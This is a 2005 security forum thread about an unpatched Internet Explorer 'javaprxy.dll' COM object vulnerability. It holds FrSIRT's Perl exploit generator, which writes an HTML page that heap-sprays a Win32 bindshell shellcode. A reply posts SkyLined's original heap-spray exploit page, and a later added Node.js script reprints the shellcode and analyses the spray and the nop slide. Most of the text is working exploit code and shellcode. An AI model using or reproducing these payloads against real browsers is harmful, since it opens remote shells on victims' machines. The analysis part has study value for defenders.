
View Full Version : Microsoft Internet Explorer "javaprxy.dll" Code Execution Exploit



team@frsirt.com
02/07/05, 23:55
Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit (Unpatched)

Advisory : FrSIRT/ADV-2005-0935
Rated as : Critical
Status : Unpatched
Code : http://www.frsirt.com/exploits/20050702.iejavaprxyexploit.pl.php

#!/usr/bin/perl
######################################################
#
# Microsoft Internet Explorer "javaprxy.dll" COM Object Exploit -Unpatched-
#
# Proof of Concept by the FrSIRT < http://www.frsirt.com / team@frsirt.com >
# Bindshell on port 28876
# 01 July 2005
#
# Description - http://www.frsirt.com/english/advisories/2005/0935
# Workarounds - http://www.microsoft.com/technet/security/advisory/903144.mspx
# Sec-consult - http://www.sec-consult.com/184.html
#
# Solution :
# Set Internet and Local intranet security zone settings to "High" or use
# another browser until a patch is released.
#
# Tested on :
# Internet Explorer 6 on Microsoft Windows XP SP2
# Internet Explorer 6 on Microsoft Windows XP SP1
#
# Affected versions :
# Internet Explorer 5.01 Service Pack 3 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 3
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4
# Internet Explorer 6 Service Pack 1 on Microsoft Windows XP Service Pack 1
# Internet Explorer 6 for Microsoft Windows XP Service Pack 2
# Internet Explorer 6 Service Pack 1 for Microsoft Windows XP 64-Bit SP1 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003
# Internet Explorer 6 for Microsoft Windows Server 2003 Service Pack 1
# Internet Explorer 6 for Microsoft Windows Server 2003 for Itanium-based Systems
# Internet Explorer 6 for Microsoft Windows Server 2003 with SP1 for Itanium
# Internet Explorer 6 for Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
# Internet Explorer 6 for Microsoft Windows Server 2003 x64 Edition
# Internet Explorer 6 for Microsoft Windows XP Professional x64 Edition
# Internet Explorer 5.5 Service Pack 2 on Microsoft Windows Millennium Edition
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98
# Internet Explorer 6 Service Pack 1 on Microsoft Windows 98 SE
# Internet Explorer 6 Service Pack 1 on Microsoft Windows Millennium Edition
#
# Usage : perl iejavaprxyexploit.pl > mypage.html
#
######################################################

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\"+\"%u4343\"+\"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"</body><script>location.reload();</script></html>";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

stupidfrenchdudes@ripoff.fr
04/07/05, 23:45
Why don't you give Skylined credit for the exploit code instead of just ripping it off?

give_credit@where_credit_is_due.fr
05/07/05, 22:55
Although I respect these Frenchies for their "attempt" to make the Internet safer, I denounce them for failing miserably. I think it's worth noting that they stole Skylined's code, stripped it of the GPL, the comments, and the credit, only to make themselves look better. This is the original script:

<HTML><!--
________________________________________________________________________________

,sSSSs, Ss, Internet Exploiter v0.1
SS" `YS' '*Ss. MSIE <IFRAME src=... name="..."> BoF PoC exploit
iS' ,SS" Copyright (C) 2003, 2004 by Berend-Jan Wever.
YS, .ss ,sY" http://www.edup.tudelft.nl/~bjwever
`"YSSP" sSS <skylined@edup.tudelft.nl>
________________________________________________________________________________

This program is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License version 2, 1991 as published by
the Free Software Foundation.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.

A copy of the GNU General Public License can be found at:
http://www.gnu.org/licenses/gpl.html
or you can write to:
Free Software Foundation, Inc.
59 Temple Place - Suite 330
Boston, MA 02111-1307
USA.
-->

<SCRIPT language="javascript">
// Win32 MSIE exploit helper script, creates a lot of nopslides to land in
// and/or use as return address. Thanks to blazde for feedback and idears.

// Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
// others for inspiration and borrowed code.
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
// Nopslide will contain these bytes:
bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header
headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exactly
// between the the header and the shellcode in the heap blocks we want.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write good
// documentation for this.
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
// And now we can create the heap blocks, we'll create 700 of them to spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>
<!--
The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04 68 847B7071 PUSH 71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
We land inside one of the nopslides and slide on down to the shellcode.
-->

<!-- Heap corruption issue here -->
</HTML>

You can find Skylined's site as well as his heap corruption exploitation script (called Internet Exploiter) at http://www.edup.tudelft.nl/~bjwever/
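Both scripts in this thread build the same heap spray: strings of 0x0D0D characters sized so that block + shellcode fills a 0x40000-character heap block, allocated 700 (SkyLined) or 750 (FrSIRT) times, with the crash steering EAX to 0x0D0D0D0D. The following is an added example written for this thread, not FrSIRT's or SkyLined's code. It reproduces the block-sizing loop and checks what the comments above claim about it: that block + shellcode comes out exactly 0x40000 - 20 characters long, that the shellcode is '\0' free, how much heap the spray consumes, and that landing anywhere in the 0x0D slide reaches the same first real instruction. That last point is why the shellcode begins with %u4343%u4343: in 32-bit x86, 0x0D imm32 decodes as OR EAX, imm32 (5 bytes), so the final OR of the slide can swallow up to four bytes of whatever follows, and four 0x43 bytes (INC EBX) absorb that before the jmp at %u43eb. Assumptions are labelled in the code: JScript strings are UTF-16 (each %uXXXX unit is two little-endian bytes in memory) and the block size is counted in string characters, as in the original script. It runs under Node.js.

```javascript
// Added example for this thread (not FrSIRT's or SkyLined's code): reproduce the
// heap-spray block construction used by both scripts above and check what their
// comments claim about it. Assumption: JScript strings are UTF-16, so every
// %uXXXX unit occupies two little-endian bytes in memory.

// Shellcode string copied from the scripts above (Win32 bindshell, port 28876).
const SHELLCODE =
  "%u4343%u4343%u43eb" +
  "%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea" +
  "%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7" +
  "%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b" +
  "%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64" +
  "%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c" +
  "%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe" +
  "%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0" +
  "%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050" +
  "%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6" +
  "%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650" +
  "%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa" +
  "%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656" +
  "%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1" +
  "%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353" +
  "%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353" +
  "%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe" +
  "%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff" +
  "%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb";

// Decode an unescape()-style %uXXXX string into the bytes it occupies in memory.
function unescapeToBytes(s) {
  const re = /%u([0-9a-fA-F]{4})/g;
  if (s.replace(re, "") !== "") throw new Error("string is not pure %uXXXX units");
  const bytes = [];
  for (const m of s.matchAll(re)) {
    const v = parseInt(m[1], 16);
    bytes.push(v & 0xff, v >> 8);          // low byte first (little-endian)
  }
  return Uint8Array.from(bytes);
}

// The original comment calls the shellcode '\0' free; verify it on the bytes.
function hasNullByte(bytes) {
  return bytes.some((b) => b === 0);
}

// Block-sizing loop exactly as in the scripts above. Each iteration doubles
// block.length + slackspace, so the loop stops when that sum is exactly blockChars.
function buildSprayBlock(shellcode, headersize = 20, blockChars = 0x40000) {
  let bigblock = "\u0d0d\u0d0d";          // same two code units as unescape("%u0D0D%u0D0D")
  const slackspace = headersize + shellcode.length;
  while (bigblock.length < slackspace) bigblock += bigblock;
  const fillblock = bigblock.substring(0, slackspace);
  let block = bigblock.substring(0, bigblock.length - slackspace);
  while (block.length + slackspace < blockChars) block = block + block + fillblock;
  return { block, slackspace, entry: block + shellcode };
}

// Heap consumed by the spray: blocks * characters per block * 2 bytes (UTF-16 assumption).
function sprayBytes(blocks, blockChars = 0x40000) {
  return blocks * blockChars * 2;
}

// Simulate the CPU landing at `start` in a 0x0D slide. In 32-bit x86, 0x0D imm32 is
// OR EAX, imm32 (5 bytes) and 0x43 is INC EBX (1 byte); both are harmless here.
// Returns the offset of the first byte that is neither, i.e. where real code starts.
function walkSlide(bytes, start) {
  let pc = start;
  while (pc < bytes.length) {
    if (bytes[pc] === 0x0d) pc += 5;
    else if (bytes[pc] === 0x43) pc += 1;
    else return pc;
  }
  return -1;
}

// Lay out slideLen bytes of 0x0D followed by shellBytes, try every landing offset
// in the slide, and collect the distinct offsets at which real execution starts.
function landingTargets(slideLen, shellBytes) {
  const layout = new Uint8Array(slideLen + shellBytes.length);
  layout.fill(0x0d, 0, slideLen);
  layout.set(shellBytes, slideLen);
  const targets = new Set();
  for (let s = 0; s < slideLen; s++) targets.add(walkSlide(layout, s));
  return targets;
}

const shellBytes = unescapeToBytes(SHELLCODE);
const spray = buildSprayBlock(SHELLCODE);
console.log("shellcode bytes:", shellBytes.length, "null byte present:", hasNullByte(shellBytes));
console.log("block + shellcode chars:", spray.entry.length, "(0x40000 - 20 =", 0x40000 - 20, ")");
console.log("700 blocks:", sprayBytes(700) / 2 ** 20, "MiB; 750 blocks:", sprayBytes(750) / 2 ** 20, "MiB");
// With the 4 x 0x43 pad every landing offset reaches the jmp at slide end + 4;
// strip the pad and the entry point depends on where in the slide you land.
console.log("entry offsets, padded:", [...landingTargets(64, shellBytes)]);
console.log("entry offsets, pad removed:", [...landingTargets(64, shellBytes.subarray(4))]);
```

The slide length used for the landing test is kept short (64 bytes) only so that every offset can be tried; the decoding argument does not depend on it. Note that with 700 blocks the spray commits about 350 MiB of heap, which is why the original page has to reload itself (`location.reload()`) after the object is instantiated rather than hoping for a single clean hit.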